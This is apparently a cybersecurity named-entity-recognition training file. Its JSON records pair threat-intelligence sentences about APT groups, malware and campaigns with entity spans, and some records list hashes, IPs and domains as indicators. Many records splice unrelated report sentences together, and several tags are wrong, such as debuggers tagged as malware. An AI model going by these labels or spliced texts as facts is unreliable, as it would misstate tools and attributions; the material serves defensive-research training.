{"text": "] 230 [ . The Dukes could have ceased all use of CosmicDuke ( at least until they had developed a new loader ) or retired it entirely , since they still had other toolsets available . Once the raw contents of the pastebin.com post were downloaded , that data would also be executed in memory . \" Iran often adopts an asymmetric warfare strategy to accomplish its political and military goals , and its development of cyberwarfare capabilities adds to this asymmetric toolkit , allowing the country a lowcost means to conduct espionage and attack stronger adversaries .", "spans": {"THREAT_ACTOR: Dukes": [[14, 19]], "TOOL: CosmicDuke": [[49, 59]], "DOMAIN: pastebin.com": [[213, 225]], "THREAT_ACTOR: Iran": [[296, 300]]}, "info": {"id": "cyberner_stix_train_000097", "source": "cyberner_stix_train"}}
{"text": "The APC routine creates a thread in the context of the svchost.exe process that will map and execute the stage 5 malware into the winlogon.exe process . The report specifies the Magic Hound targeted political , military and defense industry in the US , UK and Israel . The launcher binary , which contains the final backdoor , is RC4 encrypted and wrapped in a layer of obfuscated shellcode . Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": {"ORGANIZATION: political": [[199, 208]], "ORGANIZATION: military": [[211, 219]], "ORGANIZATION: defense industry": [[224, 240]]}, "info": {"id": "cyberner_stix_train_000098", "source": "cyberner_stix_train"}}
{"text": "Going back to the PowerShell command , the initial reason I stopped to look at it was due to the way they concatenated variables to form the download command and output .", "spans": {"TOOL: PowerShell": [[18, 28]]}, "info": {"id": "cyberner_stix_train_000099", "source": "cyberner_stix_train"}}
{"text": "Further analysis revealed a well-established collection of fake social media profiles that appear intended to build trust and rapport with potential victims . The malicious samples we found are the early stage malware most often delivered by spear-phishing e-mails .", "spans": {"ORGANIZATION: social media": [[64, 76]]}, "info": {"id": "cyberner_stix_train_000100", "source": "cyberner_stix_train"}}
{"text": "With the malware now in place , a number of actions can be performed , including allowing attackers to secretly monitor and control smartphones via a backdoor , send messages to premium-rate numbers , and intercept two-factor authentication codes sent by online banking apps and the like . There are no obvious links between the Eastern European and Middle Eastern targets , but it is clear that Gallmaker is specifically targeting the defense , military , and government sectors . Typically this event occurs a few times to several times , Honeypot Alerts Set up a honeypot mechanism to attract interest from adversaries .", "spans": {"THREAT_ACTOR: Gallmaker": [[396, 405]], "ORGANIZATION: defense": [[436, 443]], "ORGANIZATION: military": [[446, 454]], "ORGANIZATION: government sectors": [[461, 479]]}, "info": {"id": "cyberner_stix_train_000101", "source": "cyberner_stix_train"}}
{"text": "The user ’s development patterns appear to pay particular attention to AV evasion and alternative code execution techniques .", "spans": {}, "info": {"id": "cyberner_stix_train_000102", "source": "cyberner_stix_train"}}
{"text": "The use of tools not previously observed by CTU researchers suggests that the group could have access to malware development capabilities .", "spans": {"ORGANIZATION: CTU": [[44, 47]]}, "info": {"id": "cyberner_stix_train_000103", "source": "cyberner_stix_train"}}
{"text": "The class “ org.starsizew.Ac ” is designed for this purpose ; its only task is to check if the main service is running , and restart the main service if the answer is no . The campaign appears highly targeted and delivers a backdoor we have called ' Helminth ' . First of all the macro will set the registry key “ HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\ ” & Application.Version & _ ” \\Word\\Security\\ ” and then will set up two scheduled tasks that will start respectively every 12 and 15 minutes : the first one will run a “ IndexOffice.vbs ” in the path “ %APPDATA%\\Microsoft\\Office\\ ” and the second one will run “ IndexOffice.exe ” in the same path . \" If you ve read about recent cyber attacks in the news , you might be wondering why cyber criminals try to hack into other systems and what motivates them .", "spans": {"TOOL: Helminth": [[250, 258]], "TOOL: macro": [[280, 285]], "FILEPATH: IndexOffice.vbs": [[528, 542]], "FILEPATH: IndexOffice.exe": [[618, 632]], "THREAT_ACTOR: cyber criminals": [[739, 754]]}, "info": {"id": "cyberner_stix_train_000104", "source": "cyberner_stix_train"}}
{"text": "The dropper drops the Spark backdoor binary and a shortcut file used to initiate persistence in the following locations .", "spans": {"MALWARE: Spark backdoor": [[22, 36]]}, "info": {"id": "cyberner_stix_train_000105", "source": "cyberner_stix_train"}}
{"text": "Additionally , these decoy documents are hosted on legitimate websites including a government website belonging to the Cambodia Government and in at least once case , Facebook . Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe .", "spans": {"MALWARE: decoy documents": [[21, 36]], "ORGANIZATION: Cambodia Government": [[119, 138]], "ORGANIZATION: Facebook": [[167, 175]], "FILEPATH: More_eggs malware": [[209, 226]], "FILEPATH: cmd.exe": [[310, 317]]}, "info": {"id": "cyberner_stix_train_000106", "source": "cyberner_stix_train"}}
{"text": "We were able to identify several victims in this Operation AppleJeus sequel .", "spans": {}, "info": {"id": "cyberner_stix_train_000107", "source": "cyberner_stix_train"}}
{"text": "X-Force IRIS researchers further identified that the threat actor behind the malicious documents served many of them using a URL-shortening scheme in the following pattern : briefl.ink/{a-z0-9}[5] .", "spans": {"ORGANIZATION: X-Force IRIS": [[0, 12]], "URL: briefl.ink/{a-z0-9}[5]": [[174, 196]]}, "info": {"id": "cyberner_stix_train_000108", "source": "cyberner_stix_train"}}
{"text": "An APT gang linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong . The method , which technically redirects users through local DNS poisoning , requires a fair bit of work ; recreating and maintaining fake bank sites can be an arduous task , but Kessem claims the group behind GozNym – Nymaim – appear up to the task .", "spans": {"THREAT_ACTOR: APT": [[3, 6]], "THREAT_ACTOR: gang": [[7, 11]], "ORGANIZATION: governments": [[95, 106]], "ORGANIZATION: bank": [[338, 342]], "ORGANIZATION: Kessem": [[378, 384]], "MALWARE: GozNym": [[409, 415]]}, "info": {"id": "cyberner_stix_train_000109", "source": "cyberner_stix_train"}}
{"text": "As discussed in the Actions on objectives section , the threat actors appear to wait until they have established a foothold .", "spans": {}, "info": {"id": "cyberner_stix_train_000110", "source": "cyberner_stix_train"}}
{"text": "How it works When the malware is first started on the device it will begin by removing its icon from the app drawer , hiding from the end user . APT10 has historically targeted healthcare , defense , aerospace , government , heavy industry and mining , and MSPs and IT services , as well as other sectors , for probable intellectual property theft . 9002 is the infamous RAT frequently seen in targeted attacks reported by various security vendors , including Palo Alto Networks .", "spans": {"THREAT_ACTOR: APT10": [[145, 150]], "ORGANIZATION: healthcare": [[177, 187]], "ORGANIZATION: defense": [[190, 197]], "ORGANIZATION: aerospace": [[200, 209]], "ORGANIZATION: government": [[212, 222]], "ORGANIZATION: heavy industry": [[225, 239]], "ORGANIZATION: mining": [[244, 250]], "ORGANIZATION: MSPs": [[257, 261]], "ORGANIZATION: IT services": [[266, 277]], "ORGANIZATION: sectors": [[297, 304]], "MALWARE: 9002": [[350, 354]], "ORGANIZATION: Palo Alto Networks": [[460, 478]]}, "info": {"id": "cyberner_stix_train_000111", "source": "cyberner_stix_train"}}
{"text": "It also has engaged in network reconnaissance against targets of interest to TEMP.Veles .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[77, 87]]}, "info": {"id": "cyberner_stix_train_000112", "source": "cyberner_stix_train"}}
{"text": "It possesses a wide range of technical exploitation capabilities , significant resources for researching or purchasing complicated zero-day exploits , the ability to sustain persistence across victim networks for years , and the manpower to develop and maintain a large number of tools to use within unique victim networks . TClient is actually one of Tropic Trooper 's other backdoors .", "spans": {"TOOL: technical exploitation capabilities": [[29, 64]], "VULNERABILITY: zero-day exploits": [[131, 148]], "MALWARE: TClient": [[325, 332]]}, "info": {"id": "cyberner_stix_train_000113", "source": "cyberner_stix_train"}}
{"text": "] 205 3b89e5cd49c05ce6dc681589e6c368d9 ir.abed.dastan dexlib 2.x 185.141.60 [ . Similar to the Bisonal variant targeting the Russian organization , this sample was also disguised as PDF document . This cloud service-based backdoor contains many features .", "spans": {"MALWARE: Bisonal": [[95, 102]]}, "info": {"id": "cyberner_stix_train_000114", "source": "cyberner_stix_train"}}
{"text": "Rotexy may start requesting device administrator privileges again in an infinite loop ; in that case , restart the device in safe mode and remove the malicious program . Careto 's Mask campaign we discovered relies on spear-phishing e-mails with links to a malicious website . The Leviathan generally emailed Microsoft Excel documents with malicious macros to US universities with military interests , most frequently related to the Navy .", "spans": {"MALWARE: Rotexy": [[0, 6]], "MALWARE: Careto": [[170, 176]], "THREAT_ACTOR: Leviathan": [[281, 290]], "ORGANIZATION: universities": [[363, 375]], "ORGANIZATION: military": [[381, 389]], "ORGANIZATION: Navy": [[433, 437]]}, "info": {"id": "cyberner_stix_train_000115", "source": "cyberner_stix_train"}}
{"text": "Reduce privileges to only those needed for a user 's duties .", "spans": {}, "info": {"id": "cyberner_stix_train_000116", "source": "cyberner_stix_train"}}
{"text": "After gaining access to each of the IoT devices , the actor ran tcpdump to sniff network traffic on local subnets .", "spans": {"TOOL: IoT": [[36, 39]]}, "info": {"id": "cyberner_stix_train_000117", "source": "cyberner_stix_train"}}
{"text": "The timeline of modification dates within the ZIP also suggest the actor changed the Russian version to English in sequential order , heightening the possibility of a deliberate effort to mask its origins .", "spans": {"TOOL: ZIP": [[46, 49]]}, "info": {"id": "cyberner_stix_train_000118", "source": "cyberner_stix_train"}}
{"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . The Magic Hound has repeatedly used social media to identify and interact with employees at targeted organizations and then used weaponized Excel documents .", "spans": {"MALWARE: them": [[22, 26]], "ORGANIZATION: social media": [[199, 211]], "ORGANIZATION: employees": [[242, 251]]}, "info": {"id": "cyberner_stix_train_000119", "source": "cyberner_stix_train"}}
{"text": "TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "ORGANIZATION: CTU": [[56, 59]], "VULNERABILITY: zero-day": [[114, 122]]}, "info": {"id": "cyberner_stix_train_000120", "source": "cyberner_stix_train"}}
{"text": "Apple has confirmed that the iOS apps are not functioning based on analysis of the codes , and stated that the sandbox is able to detect and block these malicious behaviors . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . #3 and #4 as successors of #11 ) While a sudden dip in attacks is n't too unusual for top ransomware gangs , it 's worth mentioning that in last month ’s review we speculated that Royal might be going through a rebrand .", "spans": {"ORGANIZATION: Apple": [[0, 5]], "SYSTEM: iOS": [[29, 32]], "ORGANIZATION: CSIS": [[225, 229]], "VULNERABILITY: Carbanak": [[263, 271]], "ORGANIZATION: customers": [[301, 310]], "THREAT_ACTOR: Royal": [[493, 498]]}, "info": {"id": "cyberner_stix_train_000121", "source": "cyberner_stix_train"}}
{"text": "Each of them consists of a set of plugins designed for different tasks : while FuzzBunch plugins are responsible for reconnaissance and attacking a victim , plugins in the DanderSpritz framework are developed for managing already infected victims . In 2016 , for instance , we found their campaigns attacking Japanese organizations with various malware tools , notably the Elirks backdoor .", "spans": {"TOOL: FuzzBunch plugins": [[79, 96]], "TOOL: DanderSpritz": [[172, 184]], "MALWARE: Elirks backdoor": [[373, 388]]}, "info": {"id": "cyberner_stix_train_000122", "source": "cyberner_stix_train"}}
{"text": "Attaching with IDA Pro via WinDbg as in Figure 11 shows that the program counter points to the infinite loop written in memory allocated by flare-qdb . We concluded that Lazarus Group was responsible for WannaCry , a destructive attack in May that targeted Microsoft customers .", "spans": {"MALWARE: IDA Pro": [[15, 22]], "MALWARE: WinDbg": [[27, 33]], "THREAT_ACTOR: Lazarus Group": [[170, 183]], "MALWARE: WannaCry": [[204, 212]], "ORGANIZATION: Microsoft customers": [[257, 276]]}, "info": {"id": "cyberner_stix_train_000123", "source": "cyberner_stix_train"}}
{"text": "Rar.exe : Legitimate WinRAR , 26d9212ec8dbca45383eb95ec53c05357851bd7529fa0761d649f62e90c4e9fd . atec.exe : Compiled Impacket atexec tool , a4aca75bcc8f18b8a2316fd67a7e545c59b871d32de0b325f56d22584038fa10 . dmp.exe : Dumpert tool , e4e05c9a216c2f2b3925293503b5d5a892c33db2f6ea58753f032b80608c3f2e .", "spans": {"FILEPATH: Rar.exe": [[0, 7]], "TOOL: WinRAR": [[21, 27]], "FILEPATH: 26d9212ec8dbca45383eb95ec53c05357851bd7529fa0761d649f62e90c4e9fd": [[30, 94]], "FILEPATH: atec.exe": [[97, 105]], "TOOL: Impacket": [[117, 125]], "FILEPATH: a4aca75bcc8f18b8a2316fd67a7e545c59b871d32de0b325f56d22584038fa10": [[140, 204]], "FILEPATH: dmp.exe": [[207, 214]], "TOOL: Dumpert": [[217, 224]], "FILEPATH: e4e05c9a216c2f2b3925293503b5d5a892c33db2f6ea58753f032b80608c3f2e": [[232, 296]]}, "info": {"id": "cyberner_stix_train_000124", "source": "cyberner_stix_train"}}
{"text": "If your account has been breached , the following steps are required : A clean installation of an operating system on your mobile device is required ( a process called “ flashing ” ) . Malware overlaps between APT38 and TEMP.Hermit highlight the shared development resources accessible by multiple operational groups linked to North Korean state-sponsored activity . it is replaced with another expression for the deobfuscation . What the team uncovered was that the former MiniDuke attackers were still active , and using extremely effective social engineering techniques involving sending malicious PDF documents to compromise their victims .", "spans": {"THREAT_ACTOR: APT38": [[210, 215]], "THREAT_ACTOR: TEMP.Hermit": [[220, 231]], "THREAT_ACTOR: operational groups": [[298, 316]], "THREAT_ACTOR: MiniDuke attackers": [[474, 492]]}, "info": {"id": "cyberner_stix_train_000125", "source": "cyberner_stix_train"}}
{"text": "To further illustrate , here is a timeline of Operation Emmental and its potential relationship to OSX_DOK.C :", "spans": {"MALWARE: OSX_DOK.C": [[99, 108]]}, "info": {"id": "cyberner_stix_train_000126", "source": "cyberner_stix_train"}}
{"text": ": A9 : D5:95 : A9:91 : C2:91:77:5D:30 : F6 SHA1 Hash : 32:17 : E9:7E:06 : FE:5D:84 : BE:7C:14:0C : C6:2B:12:85 : E7:03:9A:5F The app requests extensive permissions during installation that enable a range of activities supported by the malware . Create a link file in the startup folder for AutoHotkeyU32.exe , allowing the attack to persist even after a system restart . MITRE has also developed an APT3 Adversary Emulation Plan .", "spans": {"MALWARE: link file": [[254, 263]], "MALWARE: AutoHotkeyU32.exe": [[290, 307]], "ORGANIZATION: MITRE": [[371, 376]], "THREAT_ACTOR: APT3": [[399, 403]]}, "info": {"id": "cyberner_stix_train_000127", "source": "cyberner_stix_train"}}
{"text": "Like many threat groups , TG-3390 conducts strategic web compromises ( SWCs ) , also known as watering hole attacks , on websites associated with the target organization's vertical or demographic to increase the likelihood of finding victims with relevant information .", "spans": {"THREAT_ACTOR: TG-3390": [[26, 33]], "TOOL: strategic web compromises": [[43, 68]], "TOOL: SWCs": [[71, 75]]}, "info": {"id": "cyberner_stix_train_000128", "source": "cyberner_stix_train"}}
{"text": "Lookout said in its own blog post published Wednesday that its threat detection network has recently observed a surge of Shedun attacks , indicating the scourge wo n't be going away any time soon . The researchers found that there are common elements in the macro and in the first- stage RAT used in this campaign , with former campaigns of the NICKEL ACADEMY ( Lazarus ) threat group . APT33 : 192.119.15.35 [REDACTED].ddns.net . The threat actor cleared Windows Event Logs on affected backend Exchange servers so further information was not available regarding the PowerShell commands leveraged by the threat actors .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "MALWARE: Shedun": [[121, 127]], "TOOL: RAT": [[288, 291]], "THREAT_ACTOR: NICKEL ACADEMY": [[345, 359]], "THREAT_ACTOR: Lazarus": [[362, 369]], "THREAT_ACTOR: threat group": [[372, 384]], "THREAT_ACTOR: APT33": [[387, 392]], "IP_ADDRESS: 192.119.15.35": [[395, 408]], "DOMAIN: [REDACTED].ddns.net": [[409, 428]], "THREAT_ACTOR: threat actor": [[435, 447]], "THREAT_ACTOR: threat actors": [[604, 617]]}, "info": {"id": "cyberner_stix_train_000129", "source": "cyberner_stix_train"}}
{"text": "Sample configuration file of the Trojan Through AccessibilityService , the malware monitors AccessibilityEvent events . According to security 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor . As in the previous version , the ID of the infected system is generated with exactly the same method .", "spans": {"ORGANIZATION: 360 Threat Intelligence Center": [[142, 172]], "MALWARE: njRAT backdoor": [[221, 235]]}, "info": {"id": "cyberner_stix_train_000130", "source": "cyberner_stix_train"}}
{"text": "Instead , in Version 0.0.0.2 , EventBot dynamically loads its main module . The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch .", "spans": {"MALWARE: EventBot": [[31, 39]], "MALWARE: sample": [[222, 228]], "VULNERABILITY: CVE-2017-11882": [[248, 262], [352, 366]], "VULNERABILITY: CVE-2018-0802": [[266, 279]], "THREAT_ACTOR: APT34": [[301, 306]], "TOOL: Microsoft Office": [[321, 337]], "MALWARE: POWRUNER": [[377, 385]], "MALWARE: BONDUPDATER": [[390, 401]], "ORGANIZATION: Microsoft": [[425, 434]]}, "info": {"id": "cyberner_stix_train_000131", "source": "cyberner_stix_train"}}
{"text": "Usually , PHA authors attempt to install their harmful apps on as many devices as possible . As of early June 2018 , the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the Leafminer . APT33 : 192.119.15.35 [REDACTED].ddns.net . The series features interviews with security experts and journalists , Ashley Madison executives , victims of the breach and jilted spouses .", "spans": {"TOOL: public web shell": [[196, 212]], "THREAT_ACTOR: Leafminer": [[228, 237]], "THREAT_ACTOR: APT33": [[240, 245]], "IP_ADDRESS: 192.119.15.35": [[248, 261]], "DOMAIN: [REDACTED].ddns.net": [[262, 281]], "ORGANIZATION: security experts": [[320, 336]], "ORGANIZATION: journalists": [[341, 352]], "ORGANIZATION: Ashley Madison executives": [[355, 380]], "ORGANIZATION: victims of the breach": [[383, 404]], "ORGANIZATION: jilted spouses": [[409, 423]]}, "info": {"id": "cyberner_stix_train_000132", "source": "cyberner_stix_train"}}
{"text": "FireEye observed this framework on compromised Turkish sites and Montenegrin sites over the past year . Attachments are typically sent as an executable file embedded in a ZIP archive or a password-protected Microsoft Office document .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "FILEPATH: Attachments": [[104, 115]]}, "info": {"id": "cyberner_stix_train_000133", "source": "cyberner_stix_train"}}
{"text": "The campaigns used a mix of attached zipped scripts ( WSF , VBS ) , malicious Microsoft Office documents ( Word , Excel ) , HTML attachments , password-protected Microsoft Word documents , links to malicious JavaScript , and other vectors .", "spans": {"TOOL: zipped": [[37, 43]], "TOOL: WSF": [[54, 57]], "TOOL: VBS": [[60, 63]], "ORGANIZATION: Microsoft": [[78, 87], [162, 171]], "TOOL: Office": [[88, 94]], "TOOL: Word": [[107, 111], [172, 176]], "TOOL: Excel": [[114, 119]], "TOOL: HTML": [[124, 128]], "TOOL: JavaScript": [[208, 218]]}, "info": {"id": "cyberner_stix_train_000134", "source": "cyberner_stix_train"}}
{"text": "The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload . The scanner was identified as the Acunetix Web Vulnerability Scanner which is a commercial penetration testing tool that is readily available as a 14-day trial .", "spans": {"TOOL: downloader malware": [[4, 22]], "FILEPATH: Acunetix Web Vulnerability Scanner": [[143, 177]]}, "info": {"id": "cyberner_stix_train_000135", "source": "cyberner_stix_train"}}
{"text": "We detect the malware used in this attack as “ Backdoor.AndroidOS.Chuli.a ” . Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) . On November 15 , 2016 , an actor related to the OilRig campaign began testing the Clayslide delivery documents .", "spans": {"MALWARE: Backdoor.AndroidOS.Chuli.a": [[47, 73]], "THREAT_ACTOR: The Lamberts": [[123, 135]], "ORGANIZATION: ITSec community": [[175, 190]], "ORGANIZATION: FireEye": [[226, 233]], "VULNERABILITY: zero day vulnerability": [[263, 285]], "VULNERABILITY: CVE-2014-4148": [[288, 301]], "THREAT_ACTOR: actor": [[333, 338]], "MALWARE: Clayslide delivery documents": [[388, 416]]}, "info": {"id": "cyberner_stix_train_000136", "source": "cyberner_stix_train"}}
{"text": "Additionally , the apparent timezone of the timestamps in all of the GeminiDuke samples compiled during the winter is UTC+3 , while for samples compiled during the summer , it is UTC+4 .", "spans": {"MALWARE: GeminiDuke": [[69, 79]]}, "info": {"id": "cyberner_stix_train_000137", "source": "cyberner_stix_train"}}
{"text": "Those vulnerabilities could have enabled someone to gain broad access to an Android device . This report , alongside the plethora of other reporting on APT10 operations , acutely highlights the vulnerability of organizational supply chains . NamelessHdoor : dfc8a6da93481e9dab767c8b42e2ffbcd08fb813123c91b723a6e6d70196636f .", "spans": {"SYSTEM: Android": [[76, 83]], "THREAT_ACTOR: APT10": [[152, 157]], "MALWARE: NamelessHdoor": [[242, 255]], "FILEPATH: dfc8a6da93481e9dab767c8b42e2ffbcd08fb813123c91b723a6e6d70196636f": [[258, 322]]}, "info": {"id": "cyberner_stix_train_000138", "source": "cyberner_stix_train"}}
{"text": "When the document was opened in Word , it exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . Over the years they've used application components from Norman , McAfee and Norton .", "spans": {"TOOL: Word": [[32, 36]], "VULNERABILITY: CVE-2015-2545": [[147, 160]], "THREAT_ACTOR: attacker": [[194, 202]], "ORGANIZATION: Norman": [[332, 338]], "ORGANIZATION: McAfee": [[341, 347]], "ORGANIZATION: Norton": [[352, 358]]}, "info": {"id": "cyberner_stix_train_000139", "source": "cyberner_stix_train"}}
{"text": "One reason for the distinction may be differences in evidence , as FireEye ’s public reporting notes two distinct events of which they are aware of and have responded to related to “ the TRITON actor ” while Dragos has been engaged several instances – thus , Dragos would possess more evidence to cement the definition of an activity group , while FireEye ’s data collection-centric approach would require far more observations to yield an “ APT ” .", "spans": {"ORGANIZATION: FireEye": [[67, 74], [348, 355]], "MALWARE: TRITON": [[187, 193]], "ORGANIZATION: Dragos": [[208, 214], [259, 265]]}, "info": {"id": "cyberner_stix_train_000140", "source": "cyberner_stix_train"}}
{"text": "For example , the password \" admin-windows2014 \" shown in Figure 14 was changed to \"admin-windows2015\" for TG-3390 intrusions conducted in 2015 .", "spans": {"THREAT_ACTOR: TG-3390": [[107, 114]]}, "info": {"id": "cyberner_stix_train_000141", "source": "cyberner_stix_train"}}
{"text": "Figure 2 – Granting Permissions The following permissions are granted to the app : Figure 3 – Permissions Granted to App A closer look at the code reveals the application gathers a list of installed applications to compare the results against a list of targeted applications ( Figure 4 ) . However , an investigation by Symantec has found that the group has been active since at least March 2012 and its attacks have not only continued to the present day , but have also increased in number . The last piece is the newly discovered CopyPaste group , who targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . Instead , victims would end up infecting their computers with the NetSupport RAT , allowing threat actors to gain remote access and deliver additional payloads .", "spans": {"ORGANIZATION: Symantec": [[320, 328]], "THREAT_ACTOR: CopyPaste": [[532, 541], [649, 658]], "ORGANIZATION: victims": [[729, 736]], "TOOL: NetSupport RAT": [[785, 799]]}, "info": {"id": "cyberner_stix_train_000142", "source": "cyberner_stix_train"}}
{"text": "2c50eedc260c82dc176447aa4116ad37112864f4e1e3e95c4817499d9f18a90d .", "spans": {"FILEPATH: 2c50eedc260c82dc176447aa4116ad37112864f4e1e3e95c4817499d9f18a90d": [[0, 64]]}, "info": {"id": "cyberner_stix_train_000143", "source": "cyberner_stix_train"}}
{"text": "Unwary users who click the seemingly innocuous link will have their device infected with RuMMS malware . In May 2016 , both PROMETHIUM and NEODYMIUM were observed to launch attack campaigns . The downloaded document has a “ .dot ” extension , used by Microsoft Office to save templates for different documents with similar formats . The attackers are known for their targeting of highvalue victims , often focusing on organizations in the government , technology , and defense sectors .", "spans": {"MALWARE: RuMMS": [[89, 94]], "THREAT_ACTOR: PROMETHIUM": [[124, 134]], "THREAT_ACTOR: NEODYMIUM": [[139, 148]], "FILEPATH: .dot": [[224, 228]], "TOOL: Microsoft Office": [[251, 266]], "THREAT_ACTOR: attackers": [[336, 345]], "ORGANIZATION: highvalue victims": [[379, 396]], "ORGANIZATION: organizations": [[417, 430]], "ORGANIZATION: government": [[438, 448]], "ORGANIZATION: technology": [[451, 461]], "ORGANIZATION: defense sectors": [[468, 483]]}, "info": {"id": "cyberner_stix_train_000144", "source": "cyberner_stix_train"}}
{"text": "Issue remote mouse clicks and keyboard strokes .", "spans": {}, "info": {"id": "cyberner_stix_train_000145", "source": "cyberner_stix_train"}}
{"text": "The best bet for Readers who want to make sure their phone is n't infected is to scan their phones using the free version of the Lookout Security and Antivirus app . Last week Microsoft , working together with Facebook and others in the security community , took strong steps to protect our customers and the internet from ongoing attacks by an advanced persistent threat actor known to us as ZINC , also known as the Lazarus Group . APT33 : 91.230.121.143 remote-server.ddns.net . The group , which was primarily motivated by profit , is noted for utilizing self - developed technically - proficient tools for their attacks .", "spans": {"ORGANIZATION: Lookout": [[129, 136]], "ORGANIZATION: Microsoft": [[176, 185]], "ORGANIZATION: Facebook": [[210, 218]], "ORGANIZATION: security community": [[237, 255]], "THREAT_ACTOR: threat actor": [[365, 377]], "THREAT_ACTOR: ZINC": [[393, 397]], "THREAT_ACTOR: Lazarus Group": [[418, 431]], "THREAT_ACTOR: APT33": [[434, 439]], "IP_ADDRESS: 91.230.121.143": [[442, 456]], "DOMAIN: remote-server.ddns.net": [[457, 479]]}, "info": {"id": "cyberner_stix_train_000146", "source": "cyberner_stix_train"}}
{"text": "In the campaign that targeted Japan , Philippines , and Argentina on June 20 , we found what seems to be a new , undisclosed malware , which we named Gelup . Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent .", "spans": {"MALWARE: Gelup": [[150, 155]], "THREAT_ACTOR: CopyKittens": [[189, 200]], "MALWARE: Metasploit": [[205, 215]], "VULNERABILITY: exploit": [[291, 298]], "MALWARE: Mimikatz": [[338, 346]], "MALWARE: Empire": [[413, 419]], "MALWARE: PowerShell": [[424, 434]], "TOOL: Python": [[439, 445]]}, "info": {"id": "cyberner_stix_train_000147", "source": "cyberner_stix_train"}}
{"text": "These included the use of certificate pinning and public key encryption for C2 communications , geo-restrictions imposed by the C2 when delivering the second stage , and the comprehensive and well implemented suite of surveillance features . These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider . The group is known for espionage campaigns in the Middle East .", "spans": {"THREAT_ACTOR: criminal groups": [[270, 285]], "THREAT_ACTOR: PoSeidon": [[346, 354]], "VULNERABILITY: Carbanak": [[390, 398]], "THREAT_ACTOR: criminal organization": [[416, 437]], "THREAT_ACTOR: Carbon Spider": [[450, 463]]}, "info": {"id": "cyberner_stix_train_000148", "source": "cyberner_stix_train"}}
{"text": "checkApps : Asks the malware to see if the packages sent as parameters are installed . The Seedworm group is the only group known to use the Powermud backdoor . The hidden window created by the malware filters on any user input ( e.g . keyboard or mouse activity ) . According to Kaspersky telemetry , targeted organizations included think tanks and individuals working in various areas related to security and geopolitics .", "spans": {"THREAT_ACTOR: Seedworm group": [[91, 105]], "THREAT_ACTOR: group": [[118, 123]], "TOOL: Powermud backdoor": [[141, 158]], "ORGANIZATION: Kaspersky": [[280, 289]], "ORGANIZATION: think tanks": [[334, 345]], "ORGANIZATION: individuals working in various areas related to security and geopolitics": [[350, 422]]}, "info": {"id": "cyberner_stix_train_000149", "source": "cyberner_stix_train"}}
{"text": "It sends “ home ” key data about the affected device : device type , OS version , language , number of installed apps , free storage space , battery status , whether the device is rooted and Developer mode enabled , and whether Facebook and FB Messenger are installed . Kaspersky have observed similar activity in the past from groups such as Oilrig and Stonedrill , which leads us to believe the new attacks could be connected , though for now that connection is only assessed as low confidence . Upload a specific file based on a filename .", "spans": {"ORGANIZATION: Facebook": [[228, 236]], "SYSTEM: Messenger": [[244, 253]], "ORGANIZATION: Kaspersky": [[270, 279]], "THREAT_ACTOR: Oilrig": [[343, 349]], "THREAT_ACTOR: Stonedrill": [[354, 364]]}, "info": {"id": "cyberner_stix_train_000150", "source": "cyberner_stix_train"}}
{"text": "Table 1 not only shows the commands used for discovery , but also the commands used to deploy another webshell to the server using the echo command to write base64 encoded data to a.txt and using the certutil application to decode and save to bitreeview.aspx .", "spans": {"FILEPATH: a.txt": [[180, 185]], "FILEPATH: bitreeview.aspx": [[243, 258]]}, "info": {"id": "cyberner_stix_train_000151", "source": "cyberner_stix_train"}}
{"text": "APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns . In May 2015 , Palo Alto Networks WildFire detected two e-mails carrying malicious documents from a genuine and compromised Israeli Gmail account , sent to an Israeli industrial organization .", "spans": {"THREAT_ACTOR: APT39": [[0, 5]], "ORGANIZATION: telecommunications and travel industries": [[22, 62]], "ORGANIZATION: specific individuals": [[149, 169]], "ORGANIZATION: Palo Alto Networks WildFire": [[404, 431]], "TOOL: e-mails": [[445, 452]], "ORGANIZATION: industrial organization": [[556, 579]]}, "info": {"id": "cyberner_stix_train_000152", "source": "cyberner_stix_train"}}
{"text": "Many of these individuals held communications , media , finance , or policy roles .", "spans": {}, "info": {"id": "cyberner_stix_train_000153", "source": "cyberner_stix_train"}}
